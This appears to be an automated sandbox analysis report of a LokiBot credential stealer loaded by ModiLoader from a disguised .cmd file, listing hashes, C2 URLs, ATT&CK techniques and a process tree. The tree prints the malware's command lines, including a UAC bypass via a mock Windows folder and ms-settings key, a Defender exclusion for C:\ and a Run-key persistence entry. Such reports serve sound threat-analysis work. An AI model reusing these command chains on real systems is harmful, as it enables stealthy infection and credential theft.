lokibot | c37109d5225709d11a36989b91b769d00264f719b98c357f7014fe02ad7dd17e

Analysis

max time kernel
148s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
04-08-2024 18:37

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Potrditev.cmd
Size

2.8MB
MD5

306e6e3743666b8f5fedb0127b041883
SHA1

53ac1756ee69296be5f5c99ee18b1d1cb70369d4
SHA256

20a156c7ad57c2c78a63e7f8d318d2bbba7e0d94186f92ef469aed643e1bf5cc
SHA512

233d9861fe624b707fe4b89435cf27f1216006e97b97374fa159574d63ca6db351fc2cba454554c82d210ca6f8a4f8be383c6723eab0a54ac1a2e984317804c1
SSDEEP

24576:RrZhKnjYBTiXW66DrApJCe4tnUNLgVaQzNqWDNRp6KNng1pyyIzmAZrQf3m29Yqk:Rr0jYNi8DrApkpUNLgVDzNVpeIh/c2B

Score

10^/10

lokibot modiloader collection credential_access discovery persistence spyware stealer trojan

Malware Config

Extracted

Family

lokibot

http://104.248.205.66/index.php/modify.php?edit=1

http://kbfvzoboss.bid/alien/fre.php

http://alphastand.trade/alien/fre.php

http://alphastand.win/alien/fre.php

http://alphastand.top/alien/fre.php

Signatures

Lokibot
Lokibot is a Password and CryptoCoin Wallet Stealer.
trojan spyware stealer lokibot
ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
trojan modiloader
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003

ModiLoader Second Stage 4 IoCs

resource	yara_rule
behavioral2/memory/4276-108-0x0000000000400000-0x0000000001400000-memory.dmp	modiloader_stage2
behavioral2/memory/4276-106-0x0000000000400000-0x0000000001400000-memory.dmp	modiloader_stage2
behavioral2/memory/4276-128-0x0000000000400000-0x0000000001400000-memory.dmp	modiloader_stage2
behavioral2/memory/4276-143-0x0000000000400000-0x0000000001400000-memory.dmp	modiloader_stage2

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation	per.exe
Key value queried	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation	hargjrdZ.pif

Executes dropped EXE 29 IoCs

pid	Process
3044	alpha.exe
1324	alpha.exe
5032	kn.exe
3476	alpha.exe
436	kn.exe
3608	CLEAN.COM
4732	alpha.exe
1588	alpha.exe
2196	hargjrdZ.pif
1584	alpha.exe
3856	alpha.exe
3908	alpha.exe
1896	alpha.exe
5096	alpha.exe
4744	alpha.exe
4792	xkn.exe
4336	alpha.exe
4160	ger.exe
1876	per.exe
4032	alpha.exe
444	alpha.exe
2848	alpha.exe
3268	alpha.exe
5076	alpha.exe
3944	alpha.exe
4240	alpha.exe
1312	alpha.exe
1344	alpha.exe
4276	hargjrdZ.pif

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	hargjrdZ.pif
Key opened	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook	hargjrdZ.pif
Key opened	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	hargjrdZ.pif

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Zdrjgrah = "C:\\Users\\Public\\Zdrjgrah.url"	CLEAN.COM

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 3608 set thread context of 2196	3608	CLEAN.COM	97
PID 3608 set thread context of 4276	3608	CLEAN.COM	134

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CLEAN.COM
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	hargjrdZ.pif
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	extrac32.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
444	alpha.exe
4888	PING.EXE

Kills process with taskkill 1 IoCs

evasion

pid	Process
1096	taskkill.exe

Modifies registry class 5 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\ms-settings\shell\open	ger.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\ms-settings\shell\open\command\ = "C:\\\\Users\\\\Public\\\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\""	ger.exe
Key created	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\ms-settings\shell\open\command	ger.exe
Key created	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\ms-settings	ger.exe
Key created	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\ms-settings\shell	ger.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
4888	PING.EXE

Script User-Agent 1 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	24	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
4792	xkn.exe
4792	xkn.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	4792	xkn.exe
Token: SeDebugPrivilege	1096	taskkill.exe
Token: SeDebugPrivilege	4276	hargjrdZ.pif

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2944 wrote to memory of 2092	2944	cmd.exe	85
PID 2944 wrote to memory of 2092	2944	cmd.exe	85
PID 2944 wrote to memory of 3044	2944	cmd.exe	87
PID 2944 wrote to memory of 3044	2944	cmd.exe	87
PID 3044 wrote to memory of 3288	3044	alpha.exe	88
PID 3044 wrote to memory of 3288	3044	alpha.exe	88
PID 2944 wrote to memory of 1324	2944	cmd.exe	90
PID 2944 wrote to memory of 1324	2944	cmd.exe	90
PID 1324 wrote to memory of 5032	1324	alpha.exe	91
PID 1324 wrote to memory of 5032	1324	alpha.exe	91
PID 2944 wrote to memory of 3476	2944	cmd.exe	92
PID 2944 wrote to memory of 3476	2944	cmd.exe	92
PID 3476 wrote to memory of 436	3476	alpha.exe	93
PID 3476 wrote to memory of 436	3476	alpha.exe	93
PID 2944 wrote to memory of 3608	2944	cmd.exe	94
PID 2944 wrote to memory of 3608	2944	cmd.exe	94
PID 2944 wrote to memory of 3608	2944	cmd.exe	94
PID 2944 wrote to memory of 4732	2944	cmd.exe	95
PID 2944 wrote to memory of 4732	2944	cmd.exe	95
PID 2944 wrote to memory of 1588	2944	cmd.exe	96
PID 2944 wrote to memory of 1588	2944	cmd.exe	96
PID 3608 wrote to memory of 2196	3608	CLEAN.COM	97
PID 3608 wrote to memory of 2196	3608	CLEAN.COM	97
PID 3608 wrote to memory of 2196	3608	CLEAN.COM	97
PID 3608 wrote to memory of 2196	3608	CLEAN.COM	97
PID 3608 wrote to memory of 2196	3608	CLEAN.COM	97
PID 2196 wrote to memory of 2948	2196	hargjrdZ.pif	98
PID 2196 wrote to memory of 2948	2196	hargjrdZ.pif	98
PID 2948 wrote to memory of 768	2948	cmd.exe	101
PID 2948 wrote to memory of 768	2948	cmd.exe	101
PID 2948 wrote to memory of 1584	2948	cmd.exe	102
PID 2948 wrote to memory of 1584	2948	cmd.exe	102
PID 2948 wrote to memory of 3856	2948	cmd.exe	103
PID 2948 wrote to memory of 3856	2948	cmd.exe	103
PID 2948 wrote to memory of 3908	2948	cmd.exe	104
PID 2948 wrote to memory of 3908	2948	cmd.exe	104
PID 3908 wrote to memory of 2348	3908	alpha.exe	105
PID 3908 wrote to memory of 2348	3908	alpha.exe	105
PID 2948 wrote to memory of 1896	2948	cmd.exe	106
PID 2948 wrote to memory of 1896	2948	cmd.exe	106
PID 1896 wrote to memory of 3356	1896	alpha.exe	107
PID 1896 wrote to memory of 3356	1896	alpha.exe	107
PID 2948 wrote to memory of 5096	2948	cmd.exe	108
PID 2948 wrote to memory of 5096	2948	cmd.exe	108
PID 5096 wrote to memory of 60	5096	alpha.exe	109
PID 5096 wrote to memory of 60	5096	alpha.exe	109
PID 2948 wrote to memory of 4744	2948	cmd.exe	110
PID 2948 wrote to memory of 4744	2948	cmd.exe	110
PID 4744 wrote to memory of 4792	4744	alpha.exe	111
PID 4744 wrote to memory of 4792	4744	alpha.exe	111
PID 4792 wrote to memory of 4336	4792	xkn.exe	112
PID 4792 wrote to memory of 4336	4792	xkn.exe	112
PID 4336 wrote to memory of 4160	4336	alpha.exe	113
PID 4336 wrote to memory of 4160	4336	alpha.exe	113
PID 2948 wrote to memory of 1876	2948	cmd.exe	114
PID 2948 wrote to memory of 1876	2948	cmd.exe	114
PID 2948 wrote to memory of 4032	2948	cmd.exe	119
PID 2948 wrote to memory of 4032	2948	cmd.exe	119
PID 4032 wrote to memory of 1096	4032	alpha.exe	120
PID 4032 wrote to memory of 1096	4032	alpha.exe	120
PID 2948 wrote to memory of 444	2948	cmd.exe	124
PID 2948 wrote to memory of 444	2948	cmd.exe	124
PID 444 wrote to memory of 4888	444	alpha.exe	125
PID 444 wrote to memory of 4888	444	alpha.exe	125

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	hargjrdZ.pif

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	hargjrdZ.pif

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Potrditev.cmd"
1⤵
- Suspicious use of WriteProcessMemory
PID:2944
- C:\Windows\System32\extrac32.exe
  C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
  2⤵
  PID:2092
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:3044
- - C:\Windows\system32\extrac32.exe
    extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
    3⤵
    PID:3288
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\Potrditev.cmd" "C:\\Users\\Public\\CLEAN.GIF" 9
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:1324
- - C:\Users\Public\kn.exe
    C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\Potrditev.cmd" "C:\\Users\\Public\\CLEAN.GIF" 9
    3⤵
    - Executes dropped EXE
    PID:5032
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\CLEAN.GIF" "C:\\Users\\Public\\Libraries\\CLEAN.COM" 12
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:3476
- - C:\Users\Public\kn.exe
    C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\CLEAN.GIF" "C:\\Users\\Public\\Libraries\\CLEAN.COM" 12
    3⤵
    - Executes dropped EXE
    PID:436
- C:\Users\Public\Libraries\CLEAN.COM
  C:\Users\Public\Libraries\CLEAN.COM
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:3608
- - C:\Users\Public\Libraries\hargjrdZ.pif
    C:\Users\Public\Libraries\hargjrdZ.pif
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2196
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\D7B3.tmp\D7B4.tmp\D7B5.bat C:\Users\Public\Libraries\hargjrdZ.pif"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2948
    - - C:\Windows\System32\extrac32.exe
        
        C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
        5⤵
        
        PID:768
    - - C:\Users\Public\alpha.exe
        
        C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows "
        5⤵
        Executes dropped EXE
        
        PID:1584
    - - C:\Users\Public\alpha.exe
        
        C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32"
        5⤵
        Executes dropped EXE
        
        PID:3856
    - - C:\Users\Public\alpha.exe
        
        C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:3908
      - C:\Windows\system32\extrac32.exe
        
        extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
        6⤵
        
        PID:2348
    - - C:\Users\Public\alpha.exe
        
        C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:1896
      - C:\Windows\system32\extrac32.exe
        
        extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
        6⤵
        
        PID:3356
    - - C:\Users\Public\alpha.exe
        
        C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:5096
      - C:\Windows\system32\extrac32.exe
        
        extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
        6⤵
        
        PID:60
    - - C:\Users\Public\alpha.exe
        
        C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
        5⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:4744
      - C:\Users\Public\xkn.exe
        
        C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
        6⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:4792
        
        C:\Users\Public\alpha.exe
        
        "C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
        7⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:4336
        
        C:\Users\Public\ger.exe
        
        C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
        8⤵
        Executes dropped EXE
        Modifies registry class
        
        PID:4160
    - - C:\Windows \System32\per.exe
        
        "C:\\Windows \\System32\\per.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:1876
    - - C:\Users\Public\alpha.exe
        
        C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe
        5⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:4032
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM SystemSettings.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1096
    - - C:\Users\Public\alpha.exe
        
        C:\\Users\\Public\\alpha /c ping 127.0.0.1 -n 2
        5⤵
        Executes dropped EXE
        System Network Configuration Discovery: Internet Connection Discovery
        Suspicious use of WriteProcessMemory
        
        PID:444
      - C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 2
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4888
    - - C:\Users\Public\alpha.exe
        
        C:\\Users\\Public\\alpha /c del /q "C:\Windows \System32\*"
        5⤵
        Executes dropped EXE
        
        PID:2848
    - - C:\Users\Public\alpha.exe
        
        C:\\Users\\Public\\alpha /c rmdir "C:\Windows \System32"
        5⤵
        Executes dropped EXE
        
        PID:3268
    - - C:\Users\Public\alpha.exe
        
        C:\\Users\\Public\\alpha /c rmdir "C:\Windows \"
        5⤵
        Executes dropped EXE
        
        PID:5076
    - - C:\Users\Public\alpha.exe
        
        C:\\Users\\Public\\alpha /c del /q "C:\\Windows \\System32\\per.exe" / A / F / Q / S
        5⤵
        Executes dropped EXE
        
        PID:3944
    - - C:\Users\Public\alpha.exe
        
        C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\ger.exe" / A / F / Q / S
        5⤵
        Executes dropped EXE
        
        PID:4240
    - - C:\Users\Public\alpha.exe
        
        C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
        5⤵
        Executes dropped EXE
        
        PID:1312
    - - C:\Users\Public\alpha.exe
        
        C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\xkn.exe" / A / F / Q / S
        5⤵
        Executes dropped EXE
        
        PID:1344
- - C:\Windows\SysWOW64\extrac32.exe
    C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\Public\Libraries\CLEAN.COM C:\\Users\\Public\\Libraries\\Zdrjgrah.PIF
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4704
- - C:\Users\Public\Libraries\hargjrdZ.pif
    C:\Users\Public\Libraries\hargjrdZ.pif
    3⤵
    - Executes dropped EXE
    - Accesses Microsoft Outlook profiles
    - Suspicious use of AdjustPrivilegeToken
    - outlook_office_path
    - outlook_win_path
    PID:4276
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
  2⤵
  - Executes dropped EXE
  PID:4732
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\CLEAN.GIF" / A / F / Q / S
  2⤵
  - Executes dropped EXE
  PID:1588

C:\Windows\system32\SystemSettingsAdminFlows.exe
"C:\Windows\system32\SystemSettingsAdminFlows.exe" OptionalFeaturesAdminHelper
1⤵
PID:4572

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Data from Local System

T1005

Email Collection

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\D7B3.tmp\D7B4.tmp\D7B5.bat

Filesize
1KB

MD5
e62f427202d3e5a3ba60ebe78567918c

SHA1
6ef0cd5ba6c871815fceb27ff095a7931452b334

SHA256
06bee225a830ea0e67b91fd7d24280c5315ef82049b25b07c9cfde4e36a639ff

SHA512
e15148ba4099f3b8c73319be32a5f76226d21e7fb90123bec68e5106d03b7d3e8af8caa0421667920967e8921787ba255dc4bf23d35792bf8e9a20f1e18283c6

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yzd40fwr.2rn.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-656926755-4116854191-210765258-1000\0f5007522459c86e95ffcc62f32308f1_6f95b8b4-c02b-43c9-8cd4-016780936b63

Filesize
46B

MD5
d898504a722bff1524134c6ab6a5eaa5

SHA1
e0fdc90c2ca2a0219c99d2758e68c18875a3e11e

SHA256
878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9

SHA512
26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-656926755-4116854191-210765258-1000\0f5007522459c86e95ffcc62f32308f1_6f95b8b4-c02b-43c9-8cd4-016780936b63

Filesize
46B

MD5
c07225d4e7d01d31042965f048728a0a

SHA1
69d70b340fd9f44c89adb9a2278df84faa9906b7

SHA256
8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a

SHA512
23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b

Download Submit
C:\Users\Public\CLEAN.GIF

Filesize
1.9MB

MD5
523ccf257ca222401cd3915ac086f986

SHA1
d9dcb0b165fbf6b5e085d7a70009f3924a7968e4

SHA256
e52726ecfc11680f894efff7398e244424efffd0b8fb222a7a4c1afa7c7a20f8

SHA512
1fa4acc83444c7eacfc6295bb5b24be779f986ae726a76da2cd8f0c27dfaee6c639684efa45e4515f91bdbb027025d40275a0f425344bf9fc21558807b8f544f

Download Submit
C:\Users\Public\Libraries\CLEAN.COM

Filesize
957KB

MD5
aa4820620a6d753208dbd180c8ddc87a

SHA1
d687b79b4eb4359d7c310681e978c1be1ff46109

SHA256
ae5740d23ffac06e5bda5dd0acfa6023df3c7951ca0c97bd3dc4b1dd22a34525

SHA512
1994729cd2458ca85ca4add2ace7e1f636c941b0aef4dd1d2ecbe80324463705697387b1aaf4d7413011fef3d87415bcf0d0e3e2088e18e18c5925e06688f8a6

Download Submit
C:\Users\Public\Libraries\hargjrdZ.pif

Filesize
66KB

MD5
c116d3604ceafe7057d77ff27552c215

SHA1
452b14432fb5758b46f2897aeccd89f7c82a727d

SHA256
7bcdc2e607abc65ef93afd009c3048970d9e8d1c2a18fc571562396b13ebb301

SHA512
9202a00eeaf4c5be94de32fd41bfea40fc32d368955d49b7bad2b5c23c4ebc92dccb37d99f5a14e53ad674b63f1baa6efb1feb27225c86693ead3262a26d66c6

Download Submit
C:\Users\Public\alpha.exe

Filesize
283KB

MD5
8a2122e8162dbef04694b9c3e0b6cdee

SHA1
f1efb0fddc156e4c61c5f78a54700e4e7984d55d

SHA256
b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450

SHA512
99e784141193275d4364ba1b8762b07cc150ca3cb7e9aa1d4386ba1fa87e073d0500e61572f8d1b071f2faa2a51bb123e12d9d07054b59a1a2fd768ad9f24397

Download Submit
C:\Users\Public\ger.exe

Filesize
75KB

MD5
227f63e1d9008b36bdbcc4b397780be4

SHA1
c0db341defa8ef40c03ed769a9001d600e0f4dae

SHA256
c0e25b1f9b22de445298c1e96ddfcead265ca030fa6626f61a4a4786cc4a3b7d

SHA512
101907b994d828c83587c483b4984f36caf728b766cb7a417b549852a6207e2a3fe9edc8eff5eeab13e32c4cf1417a3adccc089023114ea81974c5e6b355fed9

Download Submit
C:\Users\Public\kn.exe

Filesize
1.6MB

MD5
bd8d9943a9b1def98eb83e0fa48796c2

SHA1
70e89852f023ab7cde0173eda1208dbb580f1e4f

SHA256
8de7b4eb1301d6cbe4ea2c8d13b83280453eb64e3b3c80756bbd1560d65ca4d2

SHA512
95630fdddad5db60cc97ec76ee1ca02dbb00ee3de7d6957ecda8968570e067ab2a9df1cc07a3ce61161a994acbe8417c83661320b54d04609818009a82552f7b

Download Submit
C:\Users\Public\xkn.exe

Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Windows \System32\per.exe

Filesize
48KB

MD5
85018be1fd913656bc9ff541f017eacd

SHA1
26d7407931b713e0f0fa8b872feecdb3cf49065a

SHA256
c546e05d705ffdd5e1e18d40e2e7397f186a7c47fa5fc21f234222d057227cf5

SHA512
3e5903cf18386951c015ae23dd68a112b2f4b0968212323218c49f8413b6d508283cc6aaa929dbead853bd100adc18bf497479963dad42dfafbeb081c9035459

Download Submit
memory/2196-35-0x0000000000400000-0x0000000001400000-memory.dmp

Filesize
16.0MB

Download
memory/2196-39-0x0000000000400000-0x000000000041A000-memory.dmp

Filesize
104KB

Download
memory/2196-37-0x0000000000400000-0x0000000001400000-memory.dmp

Filesize
16.0MB

Download
memory/2196-32-0x0000000000400000-0x0000000001400000-memory.dmp

Filesize
16.0MB

Download
memory/2196-100-0x0000000000400000-0x000000000041A000-memory.dmp

Filesize
104KB

Download
memory/2196-98-0x0000000000400000-0x0000000001400000-memory.dmp

Filesize
16.0MB

Download
memory/3608-28-0x0000000000400000-0x00000000004F9000-memory.dmp

Filesize
996KB

Download
memory/4276-108-0x0000000000400000-0x0000000001400000-memory.dmp

Filesize
16.0MB

Download
memory/4276-106-0x0000000000400000-0x0000000001400000-memory.dmp

Filesize
16.0MB

Download
memory/4276-128-0x0000000000400000-0x0000000001400000-memory.dmp

Filesize
16.0MB

Download
memory/4276-130-0x0000000000400000-0x00000000004A2000-memory.dmp

Filesize
648KB

Download
memory/4276-143-0x0000000000400000-0x0000000001400000-memory.dmp

Filesize
16.0MB

Download
memory/4276-144-0x0000000000400000-0x00000000004A2000-memory.dmp

Filesize
648KB

Download
memory/4792-70-0x000001F7D5130000-0x000001F7D5152000-memory.dmp

Filesize
136KB

Download